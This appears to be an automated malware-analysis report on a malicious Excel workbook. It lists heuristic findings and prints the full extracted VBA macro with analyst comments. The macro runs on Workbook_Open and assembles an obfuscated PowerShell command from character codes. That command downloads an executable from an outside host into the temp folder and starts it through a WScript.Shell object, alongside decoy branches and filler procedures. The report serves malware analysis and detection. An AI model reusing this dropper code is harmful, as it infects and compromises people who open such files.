MALICIOUS
110
Risk Score
Heuristics 5
-
NOP sled detected — severity: high — SC_NOP_SLED. Found 20+ consecutive 0x90 bytes. Disassembly hidden — these bytes score as degenerate, not coherent x86 code (the single mnemonic 'nop' accounts for 78% of instructions — a sled or padding/filler run, not program logic).
-
VBA project inside OOXML — severity: medium — 2 related findings — OOXML_VBA. Document contains a VBA project — VBA macros present.
-
GetObject call — severity: high — OLE_VBA_GETOBJ. GetObject call. Matched line in script:
Set v55 = GetObject("new:72" & MMM) -
Workbook_Open macro — severity: low — OLE_VBA_WBOPEN. Workbook_Open macro. Matched line in script:
Private Sub Workbook_Open() -
Suspicious extracted artifact — severity: info — EXTRACTED_FILE_STATIC_TRIAGE. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4212 bytes |
SHA-256: 349657c231c30492d73caef8c9fb783de9dd81761ce3f0db352bee24ab145288
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
63 of 87 identifiers look randomly generated (e.g. 'nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZ') — consistent with name-mangling obfuscation.
|
|||
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header (as exported by olevba) for the ThisWorkbook document module.
' VB_PredeclaredId = True marks a document-object module with an auto-created
' instance, which is why the Workbook_Open event handler defined further down
' runs without being invoked explicitly. No "Option Explicit" line is present,
' so every unassigned name used in this module is an implicit Variant.
' Filler procedure. Seven parameters are declared and none is read; ten locals
' are assigned constant literals and none is read afterwards. The name
' rUgjFwdsfZeJQ is referenced nowhere else in the visible listing, so nothing
' reaches this body — it exists to pad the module and to inflate the identifier
' count flagged by the report's name-mangling heuristic.
Function rUgjFwdsfZeJQ(FtrZblTxoQdBQbzQSqMvdYPYyORoYdakIxzWIErvAq, udgWxziJIOvUhdTbNUfYLqtsSbdHN, RvnrUuSrTpqUSVNcSspdebVRVEknEVWawJxAhqJZJVA, iqXXepJkSjUpaVVQKenxTPYJXNvciPUJafjf, MIOMlIMoHaLUtPehCXTSOzRtgCCPL, umqjyVZlhGLUQnj, pApbXHPMS)
IRpMGtjdKZ = 6.07679705573677E+42
CajrnWdRldEFy = "PrXIJ"
gjgSGSDGYcOKGWDWtAsDBsfeE = 538951671172#
qKrCLVAwgStQl = "SXsJPuycxsxXQGanEBO"
ctPWQsJJqkdcPXkeAVPKOOMyEoEtVsOrCsrZHVs = 7.14152046441103E+19
kolNPUIsWwnimEfOgRScn = 8972579476#
nxWlaXfLWfcrZZcz = "jgMXZFfExMdtqCQjUAnqdulNKaHFue"
lgiivbsO = 25910860327#
rhcKBRfcMIFYoJEpvzMzxZKTGsMITUHcmwywR = "LtuftlZhxXdtAcfPtSXJEJEX"
rBdmsKIYUn = "ESfYtZvpeaUewWCgZH"
' Call-statement syntax naming the function itself with a single argument,
' although seven non-optional parameters are declared above. Whether this line
' compiles is not something the report shows; since the procedure is never
' entered, it is moot for the sample's behaviour.
rUgjFwdsfZeJQ "BoXWCkvuEMVVfoMLbmzPe"
End Function
' Auto-run entry point: Excel raises Workbook_Open when the document is opened
' (this is the OLE_VBA_WBOPEN finding in the report). Everything the sample does
' happens in the Else branches below; the Then branches are decoys.
Private Sub Workbook_Open()
' Builds a command string. It starts with "^owershell.exe" (the "^" is swapped
' for "P" further down) followed by a PowerShell array of decimal character
' codes that the command itself turns back into an ASCII string and pipes to
' IEX (Invoke-Expression). The codes are left undecoded here; the report's
' static triage classifies the extracted script as containing execution/download
' terms.
pbWszkcbU = "^owershell.exe $Mo=@(91,118,111,105,100,93,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,97,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110"
pbWszkcbU = pbWszkcbU + ",108,111,97,100,70,105,108,101,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,117,46,116,101,107,110,105,107,46,105,111,47,117,120,66,85,72,46,116,120,116,39,44,36,101,110,118,58,116,101,109,112,43,39,92,39,43,39,68,101,87,73,82,117,78,105,103,39,43,39,46,101,120,101,39,41,59,32,115,116,97,114,116,45,112,114,111,99,101,115,115,40,36,101,110,118,58,116,101,109,112,43,39,92,39,43,39,68,101,87,73,82,117,78,105,103,39,43,39,46,101,120,101,39,41);$t=[System.Text.Encoding]::ASCII.GetString($Mo)|IEX"
' Decoy: VBA's Log is the natural logarithm, so Log(367) is roughly 5.9 and this
' comparison is always False. The whole Then block is dead code.
If Log(367) = 7678.687546 Then
' Loop condition compares two different string literals, so the body never runs.
While "oBjivQdGGYTXWglkHWUjBeoVQUhTnfJNEyThtFFtRSv" = "VnhrXxuTeEqKMNRaiKTaPGS"
NErBQbRjjRzdnpvqlpiAIJU = "oeKHyVIPUJeTFtDDmGbvNontOcoZXSP"
jLMlQ = "lNJkIdLbkrm"
NBiZRzrRsWgirCuZktgRmcVNmcfJhns = 23
nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZzTXmLGf = "jaawvBlSzTiAX"
tMQMly = "uHDhRqrxGZYpaFtGnJbxczewDBuaKW"
Wend
Else
'MsgBox ("fg")
' Tail of a CLSID, kept separate from its "72" prefix so the full identifier
' never appears as one literal; "new:72" is prepended below.
MMM = "C24DD5-D70A-438B-8A42-98424B88AFB8"
' Empty Then branch; the floating-point comparison is effectively never True,
' so execution falls into the Else branch that follows.
If Cos(568) * Sqr(48) = Sin(588) + Log(346) Then
Else
' Restores the leading "P", so the string now begins "Powershell.exe" —
' presumably done so the word never appears literally in the macro source.
miz = Replace(pbWszkcbU, "^", "P")
' GetObject with a "new:" moniker instantiates a COM object directly by CLSID,
' bypassing the ProgID. The assembled {72C24DD5-D70A-438B-8A42-98424B88AFB8}
' is the CLSID commonly documented for WScript.Shell — confirm against the
' registry on the analysis host. This is the OLE_VBA_GETOBJ finding.
Set v55 = GetObject("new:72" & MMM)
' Runs the assembled command through the shell object. "s" is assigned nowhere
' in the visible listing (an Empty Variant, contributing nothing to the
' concatenation — presumably a decoy). Sin(0.1) is about 0.0998 and is passed
' as the second (window-style) argument; presumably it truncates to 0, i.e. a
' hidden window — confirm. From a detection standpoint the telemetry to alert
' on is Excel creating a WScript.Shell COM object and spawning powershell.exe.
v55.Run s & miz, Sin(0.1)
End If
End If
End Sub
' Filler procedure. Nine parameters are declared and none is read; fourteen
' locals are assigned constant literals and none is read afterwards. The name
' is referenced nowhere else in the visible listing, so this body is never
' executed — it pads the module and inflates the randomly-generated identifier
' count noted in the report (195 of 289 in the VBA project).
Sub fEUSKnPSlxMgkIeVldhvlBVbNuCqvLmkM(PsiXWhQqeiQymfg, dnxeqdJFoqkLbtasrmYfoeOOeOhnEhCgefJLRAYl, djgwFPkIYGzGBHyYjAbvVAGnDgvkOar, nvLvhRYzxfgbCad, KmizwqNccstZTAtxPlTFwD, RbcyqTflcCXZbrrSwiiSpYzfwliMRHYbHvRYT, WIxHRWvbRFXTWWNkBsbwBFlSUVevSfaTyELZVi, dkVUdoykB, XuYxXqRXemvrzI)
xjdRqaHbmzKKgPARKOSNAditFQlYXa = "cTCKusTmHnJO"
QDNmqeAYRziTBjMZoiELn = 5.50763539280389E+16
qeFFYrbKaqPMdBCzitanKUUrtIHNSE = 1092071199
CihNjhkF = "wHZrEpGKXpA"
lAXVKOLQjOrV = 4.11162850312441E+36
MdvoTRynRqDvcmEBxpdEuRhKrZTYpZiP = "GsLLWD"
BXUKUZhbHOmYORquvlwuyZ = "rHnsWutqamGCWxXpSrrRanKBmPxPZZIZcZcCghKgOX"
lIOUwYveCGHX = 8.72660086900126E+36
xmFHwdQ = 2.29157474961719E+37
dgaw = 5.97491929185986E+16
UIkhLDCbYtXvArdvGSUC = "FubCkkHKIboXbDntUvDUdY"
hMwlmFXOFtxOOIeaSvQQRjXYnqBlXQiuhAtqnz = "FkNidepZlpUlYMHbyoX"
wDlroLCgNOonTbLfEBtuyRQvCfJiaZvBQBYBzVtScI = "WBhSxAbWwudze"
poJBUGnSmWRCJgiHbSpFuuVNMhyCyGmCt = 8.558293056832E+37
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header for the Sheet1 worksheet module. No procedures follow it in the
' preview, so as far as the listing shows this module carries no code; the
' sample's logic lives entirely in the ThisWorkbook module above.
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 22528 bytes |
SHA-256: ce76b2bf41cf666511a84e9fe975cd72a5fd1e8a49ac2a41a69c50dadb6c7d76
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
195 of 289 identifiers look randomly generated (e.g. 'nsEOWKuNuzRPhatFjlrqLVtlfVmoThjFdjvyyfDZ') — consistent with name-mangling obfuscation.
|
|||